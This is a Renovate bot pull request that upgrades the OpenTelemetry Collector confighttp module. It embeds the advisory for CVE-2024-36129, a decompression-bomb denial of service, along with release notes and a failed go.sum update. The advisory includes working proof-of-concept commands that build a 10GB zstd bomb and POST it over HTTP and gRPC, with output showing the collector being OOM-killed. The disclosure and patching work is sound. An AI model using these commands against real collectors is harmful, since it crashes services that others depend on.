renovate-sh-app bot commented Oct 17, 2025

This PR contains the following updates:

| Package | Change |
| ------- | ------ |
| go.opentelemetry.io/collector/config/confighttp | v0.96.0 -> v0.102.0 |

Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC

CVE-2024-36129 / GHSA-c74f-6mfw-mm4v / GO-2024-2900


Summary

An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.

Details

The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.

During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.

The root cause for this issue can be found in the following code path:

Affected File:
https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go

Affected Code:

// httpContentDecompressor offloads the task of handling compressed HTTP requests
// by identifying the compression format in the "Content-Encoding" header and re-writing
// request body so that the handlers further in the chain can work on decompressed data.
// It supports gzip and deflate/zlib compression.
func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler {
    [...]
    d := &decompressor{
        errHandler: eh,
        base:       h,
        decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){
            "": func(io.ReadCloser) (io.ReadCloser, error) {
                // Not a compressed payload. Nothing to do.
                return nil, nil
            },
            [...]
            "zstd": func(body io.ReadCloser) (io.ReadCloser, error) {
                zr, err := zstd.NewReader(
                    body,
                    zstd.WithDecoderConcurrency(1),
                )
                if err != nil {
                    return nil, err
                }
                return zr.IOReadCloser(), nil
            },
    [...]
}

func (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) {
    newBody, err := d.newBodyReader(r)
    if err != nil {
        d.errHandler(w, r, err.Error(), http.StatusBadRequest)
        return
    }
    [...]
    d.base.ServeHTTP(w, r)
}

func (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) {
    encoding := r.Header.Get(headerContentEncoding)
    decoder, ok := d.decoders[encoding]
    if !ok {
        return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding)
    }
    return decoder(r.Body)
}

To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.

PoC

This issue was confirmed as follows:

PoC Commands:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst

Output:

10+0 records in
10+0 records out
10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s

* processing: http://192.168.0.107:4318/v1/traces
*   Trying 192.168.0.107:4318...
* Connected to 192.168.0.107 (192.168.0.107) port 4318
> POST /v1/traces HTTP/1.1
> Host: 192.168.0.107:4318
> User-Agent: curl/8.2.1
> Accept: */*
> Content-Type: application/x-protobuf
> Content-Encoding: zstd
> Content-Length: 336655
>
* We are completely uploaded and fine
* Recv failure: Connection reset by peer
* Closing connection
curl: (56) Recv failure: Connection reset by peer

Server logs:

otel-collector-1  | 2024-05-30T18:36:14.376Z    info    [email protected]/service.go:102    Setting up own telemetry...
[...]
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    [email protected]/otlp.go:152    Starting HTTP server    {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"}
otel-collector-1  | 2024-05-30T18:36:14.385Z    info    [email protected]/service.go:195    Everything is ready. Begin running and processing data.
otel-collector-1  | 2024-05-30T18:36:14.385Z    warn    localhostgate/featuregate.go:63    The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default.    {"feature gate ID": "component.UseLocalHostAsDefaultHost"}
otel-collector-1 exited with code 137

A similar problem exists for configgrpc when using the zstd compression:

dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())'
curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw

Impact

Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.

Patches
  • The confighttp module version 0.102.0 contains a fix for this problem.
  • The configgrpc module version 0.102.1 contains a fix for this problem.
  • All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
  • None.
Credits

This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC in go.opentelemetry.io/collector/config/configgrpc

CVE-2024-36129 / GHSA-c74f-6mfw-mm4v / GO-2024-2900


Details

An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.

Severity

Unknown

References

This data is provided by OSV and the Go Vulnerability Database (CC-BY 4.0).


Release Notes

open-telemetry/opentelemetry-collector (go.opentelemetry.io/collector/config/confighttp)

v0.102.0

Compare Source

This release addresses GHSA-c74f-6mfw-mm4v for confighttp.

🛑 Breaking changes 🛑
  • envprovider: Restricts Environment Variable names. Environment variable names must now be ASCII only and start with a letter or an underscore, and can only contain underscores, letters, or numbers. (#​9531)
  • confighttp: Apply MaxRequestBodySize to the result of a decompressed body. This addresses GHSA-c74f-6mfw-mm4v for confighttp (#​10289)
    When using compressed payloads, the Collector would verify only the size of the compressed payload.
    This change applies the same restriction to the decompressed content. As a security measure, a limit of 20 MiB was added, which makes this a breaking change.
    For most clients, this shouldn't be a problem, but if you often have payloads that decompress to more than 20 MiB, you might want to either configure your
    client to send smaller batches (recommended), or increase the limit using the MaxRequestBodySize option.
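For clients that legitimately exceed the new cap, the limit can be raised on the receiving side. A sketch of the relevant Collector configuration, assuming the standard OTLP receiver keys (max_request_body_size is specified in bytes):

```yaml
receivers:
  otlp:
    protocols:
      http:
        endpoint: 0.0.0.0:4318
        # As of confighttp v0.102.0 this limit also applies to the
        # decompressed payload; 20971520 bytes = 20 MiB (the new default).
        max_request_body_size: 20971520
```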
💡 Enhancements 💡
  • mdatagen: auto-generate utilities to test component telemetry (#​19783)
  • mdatagen: support setting an AttributeSet for async instruments (#​9674)
  • mdatagen: support using telemetry level in telemetry builder (#​10234)
    This allows components to set the minimum level needed for them to produce telemetry. By default, this is set to configtelemetry.LevelBasic. If the telemetry level is below that minimum level, then the noop meter is used for metrics.
  • mdatagen: add support for bucket boundaries for histograms (#​10218)
  • releases: add documentation in how to verify the image signatures using cosign (#​9610)
🧰 Bug fixes 🧰
  • batchprocessor: ensure attributes are set on cardinality metadata metric (#​9674)
  • batchprocessor: Fixing processor_batch_metadata_cardinality which was broken in v0.101.0 (#​10231)
  • batchprocessor: respect telemetry level for all metrics (#​10234)
  • exporterhelper: Fix potential deadlocks in BatcherSender shutdown (#​10255)

v0.101.0

Compare Source

💡 Enhancements 💡
  • mdatagen: generate documentation for internal telemetry (#​10170)

  • mdatagen: add ability to use metadata.yaml to automatically generate instruments for components (#​10054)
    The telemetry section in metadata.yaml is used to generate
    instruments for components to measure telemetry about themselves.

  • confmap: Allow Converters to write logs during startup (#​10135)

  • otelcol: Enable logging during configuration resolution (#​10056)

🧰 Bug fixes 🧰
  • mdatagen: Run package tests when goleak is skipped (#​10125)

v0.100.0

Compare Source

🛑 Breaking changes 🛑
  • service: The validate sub-command no longer validates that each pipeline's type is the same as its component types (#​10031)
💡 Enhancements 💡
  • semconv: Add support for v1.25.0 semantic convention (#​10072)
  • builder: remove the need to go get a module to address ambiguous import paths (#​10015)
  • pmetric: Support parsing metric.metadata from OTLP JSON. (#​10026)
🧰 Bug fixes 🧰
  • exporterhelper: Fix enabled config option for batch sender (#​10076)

v0.99.0

Compare Source

🛑 Breaking changes 🛑
  • builder: Add strict version checking when using the builder. Add the temporary flag --skip-strict-versioning for skipping this check. (#​9896)
    Strict version checking will error on major and minor version mismatches
    between the otelcol_version configured and the builder version or versions
    in the go.mod. This check can be temporarily disabled by using the --skip-strict-versioning
    flag. This flag will be removed in a future minor version.

  • telemetry: Distributed internal metrics across different levels. (#​7890)
    The internal metrics levels are updated along with reported metrics:

    • The default level is changed from basic to normal, which can be overridden with service::telemetry::metrics::level configuration.
    • Batch processor metrics are updated to be reported starting from normal level:
      • processor_batch_batch_send_size
      • processor_batch_metadata_cardinality
      • processor_batch_timeout_trigger_send
      • processor_batch_size_trigger_send
    • GRPC/HTTP server and client metrics are updated to be reported starting from detailed level:
      • http.client.* metrics
      • http.server.* metrics
      • rpc.server.* metrics
      • rpc.client.* metrics
💡 Enhancements 💡
  • confighttp: Disable concurrency in zstd compression (#​8216)

  • cmd/builder: Allow configuring confmap.Providers in the builder. (#​4759)
    If no providers are specified, the defaults are used.
    The default providers are: env, file, http, https, and yaml.

    To configure providers, use the providers key in your OCB build
    manifest with a list of Go modules for your providers.
    The modules will work the same as other Collector components.

  • mdatagen: enable goleak tests by default via mdatagen (#​9959)

  • cmd/mdatagen: support excluding some metrics based on string and regexes in resource_attributes (#​9661)

  • cmd/mdatagen: Generate config and factory tests covering their requirements. (#​9940)
    The tests are moved from cmd/builder.

  • confmap: Add ProviderSettings, ConverterSettings, ProviderFactories, and ConverterFactories fields to confmap.ResolverSettings (#​9516)
    This allows configuring providers and converters, which are instantiated by NewResolver using the given factories.

🧰 Bug fixes 🧰
  • exporter/otlp: Allow DNS scheme to be used in endpoint (#​4274)
  • service: fix record sampler configuration (#​9968)
  • service: ensure the tracer provider is configured via go.opentelemetry.io/contrib/config (#​9967)
  • otlphttpexporter: Fixes a bug that was preventing the otlp http exporter from propagating status. (#​9892)
  • confmap: Fix decoding negative configuration values into uints (#​9060)

v0.98.0

Compare Source

🛑 Breaking changes 🛑
  • service: emit internal collector metrics with _ instead of / with OTLP export (#​9774)
    This addresses an issue with the names of the metrics generated by the Collector for its
    internal metrics. Note that this change only impacts users that emit telemetry using OTLP, which
    is currently still in experimental support. The Prometheus metrics already replaced / with _,
    so they are unaffected by this change.
💡 Enhancements 💡
  • mdatagen: Adds unsupported platforms to the README header (#​9794)
  • confmap: Clarify the use of embedded structs to make unmarshaling composable (#​7101)
  • nopexporter: Promote the nopexporter to beta (#​7316)
  • nopreceiver: Promote the nopreceiver to beta (#​7316)
  • otlpexporter: Checks for port in the config validation for the otlpexporter (#​9505)
  • service: Validate pipeline type against component types (#​8007)
🧰 Bug fixes 🧰
  • configtls: Fix issue where IncludeSystemCACertsPool was not consistently used between ServerConfig and ClientConfig. (#​9835)
  • component: Fix issue where the components command wasn't properly printing the component type. (#​9856)
  • otelcol: Fix issue where the validate command wasn't properly printing valid component type. (#​9866)
  • receiver/otlp: Fix bug where the otlp receiver did not properly respond with a retryable error code when possible for http (#​9357)

v0.97.0

Compare Source

🛑 Breaking changes 🛑
  • telemetry: Remove telemetry.useOtelForInternalMetrics stable feature gate (#​9752)
🚀 New components 🚀
  • exporter/nop: Add the nopexporter to serve as a placeholder exporter in a pipeline (#​7316)
    This is primarily useful for starting the Collector with only extensions enabled
    or to test Collector pipeline throughput.

  • receiver/nop: Add the nopreceiver to serve as a placeholder receiver in a pipeline (#​7316)
    This is primarily useful for starting the Collector with only extensions enabled.

💡 Enhancements 💡
  • configtls: Validates TLS min_version and max_version (#​9475)
    Introduces Validate() method in TLSSetting.

  • configcompression: Mark module as Stable. (#​9571)

  • cmd/mdatagen: Use go package name for the scope name by default and add an option to provide the scope name in metadata.yaml. (#​9693)

  • cmd/mdatagen: Generate the lifecycle tests for components by default. (#​9683)
    It's encouraged to have lifecycle tests for all components enabled, but they can be disabled if needed
    in metadata.yaml with skip_lifecycle: true and skip_shutdown: true under tests section.

  • cmd/mdatagen: optimize the mdatagen for the case like batchprocessor which use a common struct to implement consumer.Traces, consumer.Metrics, consumer.Logs in the meantime. (#​9688)

🧰 Bug fixes 🧰
  • exporterhelper: Fix persistent queue size backup on reads. (#​9740)
  • processor/batch: Prevent starting unnecessary goroutines. (#​9739)
  • otlphttpexporter: prevent error on empty response body when content type is application/json (#​9666)
  • confmap: confmap honors Unmarshal methods on config embedded structs. (#​6671)
  • otelcol: Respect telemetry configuration when running as a Windows service (#​5300)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

…ttp to v0.102.0 [security]

| datasource | package                                         | from    | to       |
| ---------- | ----------------------------------------------- | ------- | -------- |
| go         | go.opentelemetry.io/collector/config/confighttp | v0.96.0 | v0.102.0 |


Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com>

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: go.sum
Command failed: go get -t ./...
go: github.com/prometheus/common (replaced by github.com/grafana/common@v0.12.2-0.20231005125903-364b9c41e595): version "v0.12.2-0.20231005125903-364b9c41e595" invalid: unknown revision 364b9c41e595


CLA assistant check
Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.
You have signed the CLA already but the status is still pending? Let us recheck it.
